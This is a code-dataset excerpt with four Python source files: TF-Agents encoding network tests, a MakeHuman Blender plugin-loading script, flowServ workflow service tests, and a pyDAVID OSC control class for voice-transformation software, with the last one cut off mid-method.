hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e66f37c5353f8e0677fe17d966a7b79b068df462
| 14,998
|
py
|
Python
|
tf_agents/networks/encoding_network_test.py
|
niklasnolte/agents
|
065b801adf4d6be7beed64f3b07397bca3c741d2
|
[
"Apache-2.0"
] | 16
|
2020-09-23T06:21:49.000Z
|
2022-03-28T05:45:04.000Z
|
tf_agents/networks/encoding_network_test.py
|
MarioBonse/agents
|
c727141f67051b86d2564c4bd5fbc080623bfe19
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/networks/encoding_network_test.py
|
MarioBonse/agents
|
c727141f67051b86d2564c4bd5fbc080623bfe19
|
[
"Apache-2.0"
] | 6
|
2020-10-09T06:33:23.000Z
|
2022-02-03T16:16:36.000Z
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for tf_agents.networks.encoding_network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.networks import encoding_network
from tf_agents.networks import sequential_layer
from tf_agents.specs import tensor_spec
from tf_agents.utils import test_utils
class EncodingNetworkTest(test_utils.TestCase, parameterized.TestCase):
def test_empty_layers(self):
input_spec = tensor_spec.TensorSpec((2, 3), tf.float32)
network = encoding_network.EncodingNetwork(input_spec,)
with self.assertRaises(ValueError):
network.variables # pylint: disable=pointless-statement
# Only one layer to flatten input.
self.assertLen(network.layers, 1)
config = network.layers[0].get_config()
self.assertEqual('flatten', config['name'])
out, _ = network(tf.ones((1, 2, 3)))
self.assertAllEqual(out, [[1, 1, 1, 1, 1, 1]])
self.assertEmpty(network.variables)
def test_non_preprocessing_layers_2d(self):
input_spec = tensor_spec.TensorSpec((32, 32, 3), tf.float32)
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2, 1)),
fc_layer_params=(10, 5, 2),
activation_fn=tf.keras.activations.tanh,
)
network.create_variables()
variables = network.variables
self.assertLen(variables, 10)
self.assertLen(network.layers, 6)
# Validate first conv layer.
config = network.layers[0].get_config()
self.assertEqual('tanh', config['activation'])
self.assertEqual((2, 2), config['kernel_size'])
self.assertEqual(16, config['filters'])
self.assertEqual((1, 1), config['strides'])
self.assertTrue(config['trainable'])
# Validate second conv layer.
config = network.layers[1].get_config()
self.assertEqual('tanh', config['activation'])
self.assertEqual((2, 2), config['kernel_size'])
self.assertEqual(15, config['filters'])
self.assertEqual((1, 1), config['strides'])
self.assertTrue(config['trainable'])
# Validate flatten layer.
config = network.layers[2].get_config()
self.assertEqual('flatten', config['name'])
# Validate dense layers.
self.assertEqual(10, network.layers[3].get_config()['units'])
self.assertEqual(5, network.layers[4].get_config()['units'])
self.assertEqual(2, network.layers[5].get_config()['units'])
def test_non_preprocessing_layers_1d(self):
input_spec = tensor_spec.TensorSpec((32, 3), tf.float32)
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2, 1)),
fc_layer_params=(10, 5, 2),
activation_fn=tf.keras.activations.tanh,
conv_type='1d',
)
network.create_variables()
variables = network.variables
self.assertLen(variables, 10)
self.assertLen(network.layers, 6)
# Validate first conv layer.
config = network.layers[0].get_config()
self.assertEqual('tanh', config['activation'])
self.assertEqual((2,), config['kernel_size'])
self.assertEqual(16, config['filters'])
self.assertEqual((1,), config['strides'])
self.assertTrue(config['trainable'])
# Validate second conv layer.
config = network.layers[1].get_config()
self.assertEqual('tanh', config['activation'])
self.assertEqual((2,), config['kernel_size'])
self.assertEqual(15, config['filters'])
self.assertEqual((1,), config['strides'])
self.assertTrue(config['trainable'])
def test_conv_raise_error(self):
input_spec = tensor_spec.TensorSpec((32, 3), tf.float32)
with self.assertRaises(ValueError):
_ = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2, 1)),
fc_layer_params=(10, 5, 2),
activation_fn=tf.keras.activations.tanh,
conv_type='3d')
def test_conv_dilation_params(self):
with self.subTest(name='no dilations'):
input_spec = tensor_spec.TensorSpec((32, 32, 3), tf.float32)
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2, 1)),
)
network.create_variables()
variables = network.variables
self.assertLen(variables, 4)
self.assertLen(network.layers, 3)
# Validate dilation rates
config = network.layers[0].get_config()
self.assertEqual((1, 1), config['dilation_rate'])
config = network.layers[1].get_config()
self.assertEqual((1, 1), config['dilation_rate'])
with self.subTest(name='dilations'):
input_spec = tensor_spec.TensorSpec((32, 32, 3), tf.float32)
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1, 2), (15, 2, 1, (2, 4))),
)
network.create_variables()
variables = network.variables
self.assertLen(variables, 4)
self.assertLen(network.layers, 3)
# Validate dilation rates
config = network.layers[0].get_config()
self.assertEqual((2, 2), config['dilation_rate'])
config = network.layers[1].get_config()
self.assertEqual((2, 4), config['dilation_rate'])
with self.subTest(name='failing conv spec'):
input_spec = tensor_spec.TensorSpec((32, 32, 3), tf.float32)
with self.assertRaises(ValueError):
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1, 2, 4), (15, 2, 1)),
)
with self.assertRaises(ValueError):
network = encoding_network.EncodingNetwork(
input_spec,
conv_layer_params=((16, 2, 1), (15, 2)),
)
def test_preprocessing_layer_no_combiner(self):
network = encoding_network.EncodingNetwork(
input_tensor_spec=tensor_spec.TensorSpec([5], tf.float32),
preprocessing_layers=tf.keras.layers.Lambda(lambda x: x),
preprocessing_combiner=None,
fc_layer_params=(2,))
out, _ = network(tf.ones((3, 5)))
self.assertAllEqual(out.shape.as_list(), [3, 2])
def test_preprocessing_layers_no_combiner_error(self):
with self.assertRaisesRegex(ValueError, 'required'):
encoding_network.EncodingNetwork(
input_tensor_spec=[
tensor_spec.TensorSpec([5], tf.float32),
tensor_spec.TensorSpec([5], tf.float32)
],
preprocessing_layers=[
tf.keras.layers.Lambda(lambda x: x),
tf.keras.layers.Lambda(lambda x: x)
],
preprocessing_combiner=None,
fc_layer_params=(2,))
def test_error_raised_if_missing_preprocessing_layer(self):
with self.assertRaisesRegex(ValueError, 'sequence length'):
encoding_network.EncodingNetwork(
input_tensor_spec=[
tensor_spec.TensorSpec([5], tf.float32),
tensor_spec.TensorSpec([5], tf.float32)
],
preprocessing_layers=[
tf.keras.layers.Lambda(lambda x: x),
],
preprocessing_combiner=None,
fc_layer_params=(2,))
def test_error_raised_extra_preprocessing_layer(self):
with self.assertRaisesRegex(ValueError, 'sequence length'):
encoding_network.EncodingNetwork(
input_tensor_spec=tensor_spec.TensorSpec([5], tf.float32),
preprocessing_layers=[
tf.keras.layers.Lambda(lambda x: x),
tf.keras.layers.Lambda(lambda x: x)
],
preprocessing_combiner=None,
fc_layer_params=(2,))
def test_dict_spec_and_pre_processing(self):
input_spec = {
'a': tensor_spec.TensorSpec((32, 32, 3), tf.float32),
'b': tensor_spec.TensorSpec((32, 32, 3), tf.float32)
}
network = encoding_network.EncodingNetwork(
input_spec,
preprocessing_layers={
'a':
sequential_layer.SequentialLayer([
tf.keras.layers.Dense(4, activation='tanh'),
tf.keras.layers.Flatten()
]),
'b':
tf.keras.layers.Flatten()
},
fc_layer_params=(),
preprocessing_combiner=tf.keras.layers.Concatenate(axis=-1),
activation_fn=tf.keras.activations.tanh,
)
sample_input = tensor_spec.sample_spec_nest(input_spec)
output, _ = network(sample_input)
# 6144 is the shape from a concat of flat (32, 32, 3) x2.
self.assertEqual((7168,), output.shape)
def test_layers_buildable(self):
input_spec = {
'a': tensor_spec.TensorSpec((32, 32, 3), tf.float32),
'b': tensor_spec.TensorSpec((32, 32, 3), tf.float32)
}
network = encoding_network.EncodingNetwork(
input_spec,
preprocessing_layers={
'a':
sequential_layer.SequentialLayer([
tf.keras.layers.Dense(4, activation='tanh'),
tf.keras.layers.Flatten()
]),
'b':
tf.keras.layers.Flatten()
},
fc_layer_params=(),
preprocessing_combiner=tf.keras.layers.Concatenate(axis=-1),
activation_fn=tf.keras.activations.tanh,
)
network.create_variables()
self.assertNotEmpty(network.variables)
def testDenseFeaturesV1RaisesError(self):
key = 'feature_key'
state_dims = 5
column = tf.feature_column.numeric_column(key, [state_dims])
input_spec = {key: tensor_spec.TensorSpec([state_dims], tf.int32)}
dense_features = tf.compat.v1.keras.layers.DenseFeatures([column])
with self.assertRaisesRegex(ValueError, 'DenseFeatures'):
encoding_network.EncodingNetwork(
input_spec, preprocessing_combiner=dense_features)
def testNumericFeatureColumnInput(self):
key = 'feature_key'
batch_size = 3
state_dims = 5
input_shape = (batch_size, state_dims)
column = tf.feature_column.numeric_column(key, [state_dims])
state = {key: tf.ones(input_shape, tf.int32)}
input_spec = {key: tensor_spec.TensorSpec([state_dims], tf.int32)}
dense_features = tf.compat.v2.keras.layers.DenseFeatures([column])
network = encoding_network.EncodingNetwork(
input_spec, preprocessing_combiner=dense_features)
output, _ = network(state)
self.assertEqual(input_shape, output.shape)
def testIndicatorFeatureColumnInput(self):
key = 'feature_key'
vocab_list = [2, 3, 4]
column = tf.feature_column.categorical_column_with_vocabulary_list(
key, vocab_list)
column = tf.feature_column.indicator_column(column)
state_input = [3, 2, 2, 4, 3]
state = {key: tf.expand_dims(state_input, -1)}
input_spec = {key: tensor_spec.TensorSpec([1], tf.int32)}
dense_features = tf.compat.v2.keras.layers.DenseFeatures([column])
network = encoding_network.EncodingNetwork(
input_spec, preprocessing_combiner=dense_features)
output, _ = network(state)
expected_shape = (len(state_input), len(vocab_list))
self.assertEqual(expected_shape, output.shape)
def testCombinedFeatureColumnInput(self):
columns = {}
tensors = {}
specs = {}
expected_dim = 0
indicator_key = 'indicator_key'
vocab_list = [2, 3, 4]
column1 = tf.feature_column.categorical_column_with_vocabulary_list(
indicator_key, vocab_list)
columns[indicator_key] = tf.feature_column.indicator_column(column1)
state_input = [3, 2, 2, 4, 3]
tensors[indicator_key] = tf.expand_dims(state_input, -1)
specs[indicator_key] = tensor_spec.TensorSpec([1], tf.int32)
expected_dim += len(vocab_list)
# TODO(b/134950354): Test embedding column for non-eager mode only for now.
if not tf.executing_eagerly():
embedding_key = 'embedding_key'
embedding_dim = 3
vocab_list = [2, 3, 4]
column2 = tf.feature_column.categorical_column_with_vocabulary_list(
embedding_key, vocab_list)
columns[embedding_key] = tf.feature_column.embedding_column(
column2, embedding_dim)
state_input = [3, 2, 2, 4, 3]
tensors[embedding_key] = tf.expand_dims(state_input, -1)
specs[embedding_key] = tensor_spec.TensorSpec([1], tf.int32)
expected_dim += embedding_dim
numeric_key = 'numeric_key'
batch_size = 5
state_dims = 3
input_shape = (batch_size, state_dims)
columns[numeric_key] = tf.feature_column.numeric_column(
numeric_key, [state_dims])
tensors[numeric_key] = tf.ones(input_shape, tf.int32)
specs[numeric_key] = tensor_spec.TensorSpec([state_dims], tf.int32)
expected_dim += state_dims
dense_features = tf.compat.v2.keras.layers.DenseFeatures(
list(columns.values()))
network = encoding_network.EncodingNetwork(
specs, preprocessing_combiner=dense_features)
output, _ = network(tensors)
expected_shape = (batch_size, expected_dim)
self.assertEqual(expected_shape, output.shape)
@parameterized.named_parameters(
('TrainingTrue', True,),
('TrainingFalse', False))
def testDropoutFCLayers(self, training):
batch_size = 3
num_obs_dims = 5
obs_spec = tensor_spec.TensorSpec([num_obs_dims], tf.float32)
network = encoding_network.EncodingNetwork(
obs_spec,
fc_layer_params=[20],
dropout_layer_params=[0.5])
obs = tf.random.uniform([batch_size, num_obs_dims])
output1, _ = network(obs, training=training)
output2, _ = network(obs, training=training)
self.evaluate(tf.compat.v1.global_variables_initializer())
output1, output2 = self.evaluate([output1, output2])
if training:
self.assertGreater(np.linalg.norm(output1 - output2), 0)
else:
self.assertAllEqual(output1, output2)
def testWeightDecay(self):
batch_size = 3
num_obs_dims = 5
obs_spec = tensor_spec.TensorSpec([num_obs_dims], tf.float32)
network = encoding_network.EncodingNetwork(
obs_spec,
fc_layer_params=[20],
weight_decay_params=[0.5])
obs = tf.random.uniform([batch_size, num_obs_dims])
network(obs)
self.evaluate(tf.compat.v1.global_variables_initializer())
regularization_loss = self.evaluate(network.losses[0])
self.assertGreater(regularization_loss, 0)
if __name__ == '__main__':
tf.test.main()
| 36.31477
| 79
| 0.672356
|
ac994e0454cdcec0bccd27f133225df46949179b
| 2,293
|
py
|
Python
|
makehuman-master/makehuman/testsuite/blender_initTest.py
|
Radiian-Arts-Main/Radiian-Arts-BioSource
|
51e08da0b3171fe96badc68780fd0f3381d49738
|
[
"MIT"
] | 1
|
2022-03-12T03:52:55.000Z
|
2022-03-12T03:52:55.000Z
|
makehuman-master/makehuman/testsuite/blender_initTest.py
|
Phantori/Radiian-Arts-BioSource
|
51e08da0b3171fe96badc68780fd0f3381d49738
|
[
"MIT"
] | null | null | null |
makehuman-master/makehuman/testsuite/blender_initTest.py
|
Phantori/Radiian-Arts-BioSource
|
51e08da0b3171fe96badc68780fd0f3381d49738
|
[
"MIT"
] | 3
|
2020-05-10T16:11:23.000Z
|
2021-05-30T02:11:28.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Blender initialize test script
**Project Name:** MakeHuman
**Product Home Page:** http://www.makehumancommunity.org/
**Github Code Home Page:** https://github.com/makehumancommunity/
**Authors:** Jonas Hauquier
**Copyright(c):** MakeHuman Team 2001-2019
**Licensing:** AGPL3
This file is part of MakeHuman Community (www.makehumancommunity.org).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Abstract
--------
Blender script (to be used within blender) that initializes test environment
"""
import bpy
def enablePlugins():
try:
bpy.ops.wm.addon_enable(module = "io_import_scene_mhx")
print("MH_TEST SUCCESS Loaded MHX importer plugin.")
except:
print("MH_TEST ERROR Could not import load MHX importer plugin. Is it installed?")
try:
bpy.ops.wm.addon_enable(module = "maketarget")
print("MH_TEST SUCCESS Loaded maketarget plugin.")
except:
print("MH_TEST ERROR Could not import load maketarget plugin. Is it installed?")
try:
bpy.ops.wm.addon_enable(module = "makewalk")
print("MH_TEST SUCCESS Loaded makewalk plugin.")
except:
print("MH_TEST ERROR Could not import load makewalk plugin. Is it installed?")
try:
bpy.ops.wm.addon_enable(module = "makeclothes")
print("MH_TEST SUCCESS Loaded makeclothes plugin.")
except:
print("MH_TEST ERROR Could not import load makeclothes plugin. Is it installed?")
def quit():
"""
Quit blender
"""
bpy.ops.wm.quit_blender()
# Enable necessary plugins
enablePlugins()
quit()
| 28.6625
| 90
| 0.686873
|
3b895402c24bf76c6d4cd471b1b04db00e2f01fa
| 3,673
|
py
|
Python
|
tests/service/workflow/test_local_workflow_service.py
|
anrunw/flowserv-core-1
|
7116b7060aa68ab36bf08e6393be166dc5db955f
|
[
"MIT"
] | null | null | null |
tests/service/workflow/test_local_workflow_service.py
|
anrunw/flowserv-core-1
|
7116b7060aa68ab36bf08e6393be166dc5db955f
|
[
"MIT"
] | null | null | null |
tests/service/workflow/test_local_workflow_service.py
|
anrunw/flowserv-core-1
|
7116b7060aa68ab36bf08e6393be166dc5db955f
|
[
"MIT"
] | null | null | null |
# This file is part of the Reproducible and Reusable Data Analysis Workflow
# Server (flowServ).
#
# Copyright (C) 2019-2021 NYU.
#
# flowServ is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Unit tests for the local workflow service API."""
from flowserv.tests.service import create_user
import flowserv.tests.serialize as serialize
def test_delete_workflow_local(local_service, hello_world):
"""Test deleting a workflow from the repository."""
# -- Setup ----------------------------------------------------------------
#
# Create two instances of the 'Hello World' workflow.
with local_service() as api:
workflow = hello_world(api, name='W1')
workflow_id = workflow.workflow_id
hello_world(api, name='W2')
# -- Delete the first workflow --------------------------------------------
with local_service() as api:
api.workflows().delete_workflow(workflow_id)
# After deletion one workflow is left.
r = api.workflows().list_workflows()
assert len(r['workflows']) == 1
def test_get_workflow_local(local_service, hello_world):
"""Test serialization for created workflows."""
# -- Create workflow with minimal metadata --------------------------------
with local_service() as api:
user_1 = create_user(api)
workflow = hello_world(api, name='W1')
workflow_id = workflow.workflow_id
r = api.workflows().get_workflow(workflow_id)
serialize.validate_workflow_handle(doc=r)
assert len(r['parameterGroups']) == 1
serialize.validate_para_module(r['parameterGroups'][0])
assert len(r['parameters']) == 3
for para in r['parameters']:
serialize.validate_parameter(para)
with local_service(user_id=user_1) as api:
api.groups().create_group(workflow_id=workflow_id, name='G1')
r = api.workflows().get_workflow(workflow_id)
serialize.validate_workflow_handle(doc=r)
assert len(r['groups']) == 1
def test_list_workflows_local(local_service, hello_world):
"""Test serialization for workflow listings."""
# -- Setup ----------------------------------------------------------------
#
# Create two instances of the 'Hello World' workflow.
with local_service() as api:
hello_world(api, name='W1')
hello_world(api, name='W2')
# -- Workflow Listing -----------------------------------------------------
with local_service() as api:
r = api.workflows().list_workflows()
serialize.validate_workflow_listing(doc=r)
assert len(r['workflows']) == 2
def test_update_workflow_local(local_service, hello_world):
"""Test updating workflow properties."""
# -- Setup ----------------------------------------------------------------
#
# Create one instances of the 'Hello World' workflow with minimal metadata.
with local_service() as api:
workflow = hello_world(api, name='W1')
workflow_id = workflow.workflow_id
r = api.workflows().get_workflow(workflow_id)
assert 'description' not in r
assert 'instructions' not in r
# -- Update workflow ------------------------------------------------------
with local_service() as api:
r = api.workflows().update_workflow(
workflow_id=workflow_id,
name='Hello World',
description='Simple Hello World Demo',
instructions='Just run it'
)
assert r['name'] == 'Hello World'
assert r['description'] == 'Simple Hello World Demo'
assert r['instructions'] == 'Just run it'
| 40.362637
| 79
| 0.598965
|
57d00912979fec21a20bb7538394dba7abc8aca5
| 11,760
|
py
|
Python
|
pydavid/pydavid.py
|
Pablo-Arias/STIM
|
4f9594c32003bc29268226b7766cc160655f7000
|
[
"MIT"
] | 2
|
2018-02-12T14:31:14.000Z
|
2020-02-27T22:53:05.000Z
|
pydavid/pydavid.py
|
Pablo-Arias/STIM
|
4f9594c32003bc29268226b7766cc160655f7000
|
[
"MIT"
] | null | null | null |
pydavid/pydavid.py
|
Pablo-Arias/STIM
|
4f9594c32003bc29268226b7766cc160655f7000
|
[
"MIT"
] | 1
|
2018-09-27T10:11:25.000Z
|
2018-09-27T10:11:25.000Z
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 5 16:57:12 2018
@author: leehooni
"""
from __future__ import absolute_import
from __future__ import print_function
import threading
from pyosc import OSC
# pyDAVID
#
class pydavid():
address = []
global user_callback
def user_callback(path, tags, args, source):
# which user will be determined by path:
# we just throw away all slashes and join together what's left
user = ''.join(path.split("/"))
# tags will contain 'fff'
# args is a OSCMessage with data
# source is where the message came from (in case you need to reply)
print(("Now do something with", user,args[2],args[0],1-args[1]))
def __init__(self,address):
self.address = address
self.client = OSC.OSCClient()
self.server = OSC.OSCServer((address, 5681))
self.server.addDefaultHandlers()
self.server.addMsgHandler( "/user/1", user_callback )
self.server.addMsgHandler( "/user/2", user_callback )
self.server.addMsgHandler( "/user/3", user_callback )
self.server.addMsgHandler( "/user/4", user_callback )
server = self.server
self.servert = threading.Thread(target=server.serve_forever)
def connect(self):
self.client.connect((self.address, 5678))
print('Testing OSC connection...')
oscmsg = OSC.OSCMessage()
oscmsg.append('pyDAVID is connected')
oscmsg.setAddress('/print')
servert = self.servert
servert.daemon = True
servert.start()
print("Starting OSCServer. Use ctrl-C to quit.")
self.client.send(oscmsg)
print(oscmsg)
def disconnect(self):
# self.servert.exit()
# self.server.shutdown()
self.server.close()
# self.servert.join()
def ping(self):
oscmsg = OSC.OSCMessage()
oscmsg.append('ping')
oscmsg.setAddress('/ping')
self.client.send(oscmsg)
# MICROPHONE
def MicOnOff(self,value):
dbundle = OSC.OSCBundle()
if (value==0)+(value==1):
dbundle.append({'addr':"/miconoff", 'args':value})
client.send(dbundle)
else:
raise TypeError("MicOnOff : 0 or 1 expected")
def MicPreset(self,value):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':1})
dbundle.append({'addr':"/preset", 'args':value})
self.client.send(dbundle)
def MicRamp(self,preset=1, hold_time=0, ramp_time=0):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':1})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
self.client.send(dbundle)
def MicPitchShift(self, sfrecname, pitchshift=0, hold_time=0, ramp_time=0, marker_name = [], sfolderrecname = [] ):
dbundle = OSC.OSCBundle()
if marker_name != []:
dbundle.append({'addr':"/recsync", 'args':marker_name})
dbundle.append({'addr':"/miconoff", 'args':1})
dbundle.append({'addr':"/pitch", 'args':pitchshift})
dbundle.append({'addr':"/micrecname", 'args':sfrecname})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
if sfolderrecname != []:
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
def StoreMarkers(self, marker_filename = []):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/recsync-store", 'args':marker_filename})
self.client.send(dbundle)
def MicRecord(self, sfrecname, preset=1, hold_time=0, ramp_time=0, sfolderrecname = [] ):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':1})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/micrecname", 'args':sfrecname})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
#dbundle.append({'addr':"/record", 'args': 1})
if sfolderrecname != []:
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
def StopMicRecord(self):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/preset", 'args':1})
dbundle.append({'addr':"/automation", 'args':[0,0,0]})
dbundle.append({'addr':"/stoprecord", 'args': [0]})
self.client.send(dbundle)
# SOUND FILE
def SfPlay(self,sfplayname = [] ):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
dbundle.append({'addr':"/sfplay", 'args':1})
self.client.send(dbundle)
def SfPreset(self,sfplayname,value):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/preset", 'args':value})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
dbundle.append({'addr':"/sfplay", 'args':1})
self.client.send(dbundle)
def SfRamp(self,sfplayname,preset=1, hold_time=0, ramp_time=0):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
dbundle.append({'addr':"/sfplay", 'args':1})
self.client.send(dbundle)
def SfRecord(self,sfplayname, preset=1, hold_time=0, ramp_time=0, sfolderrecname = [] ):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/sfrec", 'args':0})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
#dbundle.append({'addr':"/record", 'args': 1})
if sfolderrecname != []:
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
else:
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
def SfPitchShiftRecord(self,sfplayname,pitchshift=0, hold_time=0, ramp_time=0, marker_name = [], sfolderrecname = [] ):
dbundle = OSC.OSCBundle()
if marker_name != []:
dbundle.append({'addr':"/recsync", 'args':marker_name})
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/sfrec", 'args':0})
dbundle.append({'addr':"/pitch", 'args':pitchshift})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
dbundle.append({'addr':"/sfplayname", 'args':sfplayname})
#dbundle.append({'addr':"/record", 'args':1})
if sfolderrecname != []:
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
else:
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
def SfRecIter(self,sffoldername, sfolderrecname, preset=1, hold_time=0, ramp_time=0):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
dbundle.append({'addr':"/sffoldername", 'args':sffoldername})
dbundle.append({'addr':"/automation", 'args':[1,hold_time,ramp_time]})
dbundle.append({'addr':"/preset", 'args':preset})
dbundle.append({'addr':"/sfolderrecname", 'args':sfolderrecname})
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
# SMILE
def sound_duration(self, soundfile):
""" DURATION OF ANY WAV FILE
Input : path of a wav file (string)
Returns : duration in seconds (float) """
import wave
self.soundfile = soundfile
self.audio = wave.open(self.soundfile)
self.sr = self.audio.getframerate() # Sample rate [Hz]
self.N = self.audio.getnframes() # Number of frames (int)
self.duration = round(float(self.N)/float(self.sr),2) # Duration (float) [s]
return self.duration
def get_file_list(self, file_path):
""" GET LIST OF FILE NAMES WITHOUT EXTENSION
Input : target folder path (string)
Returns : file name strings without extension (list) """
import os
self.file_path = file_path
self.file_list = os.listdir(self.file_path)
if '.DS_Store' in self.file_list: self.file_list.remove('.DS_Store') # for Mac users
# Remove item in list if it is a directory and remove extension
self.file_list_names = []
for self.file_item in self.file_list:
if os.path.isdir(os.path.join(self.file_path, self.file_item)):
self.file_list.remove(self.file_item)
self.file_item, _ = self.file_item.split('.')
self.file_list_names.append(self.file_item)
return self.file_list_names
def ZiggyControl(self, alpha = 1, harm = 0.3, winsize = 1, anawinsize = 1, sfopenpath = '', sfrecname = 'pyDAVID_ziggy', sfplaylistnum = 1, sfrecpath='', warp_freq=[0,0,10000,10000]):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/smile", 'args': ["/alpha", alpha ]})
dbundle.append({'addr':"/smile", 'args': ["/harm", harm ]})
dbundle.append({'addr':"/smile", 'args': ["/winsize", winsize ]})
dbundle.append({'addr':"/smile", 'args': ["/anawinsize", anawinsize ]})
dbundle.append({'addr':"/smile", 'args': ["/sfplaylistnum", sfplaylistnum ]})
dbundle.append({'addr':"/smile", 'args': ["/sfrecname", sfrecname ]})
dbundle.append({'addr':"/smile", 'args': ["/warp_freq", warp_freq ]})
if sfopenpath!='':
dbundle.append({'addr':"/smile", 'args': ["/sfopenpath", sfopenpath ]})
if sfrecpath!='':
dbundle.append({'addr':"/smile", 'args': ["/sfrecpath", sfrecpath ]})
self.client.send(dbundle)
def ZiggyPhoneControl(self, instance=3, alpha = 1, harm = 0.3, winsize = 1, anawinsize = 1, sfopenpath = '', sfrecname = 'pyDAVID_ziggy', sfplaylistnum = 1, sfrecpath=''):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/smile", 'args': ["/inst", instance ]})
dbundle.append({'addr':"/smile", 'args': ["/alpha", alpha ]})
dbundle.append({'addr':"/smile", 'args': ["/harm", harm ]})
dbundle.append({'addr':"/smile", 'args': ["/winsize", winsize ]})
# dbundle.append({'addr':"/smile", 'args': ["/anawinsize", anawinsize ]})
# dbundle.append({'addr':"/smile", 'args': ["/sfplaylistnum", sfplaylistnum ]})
# dbundle.append({'addr':"/smile", 'args': ["/sfrecname", sfrecname ]})
# if sfopenpath!='':
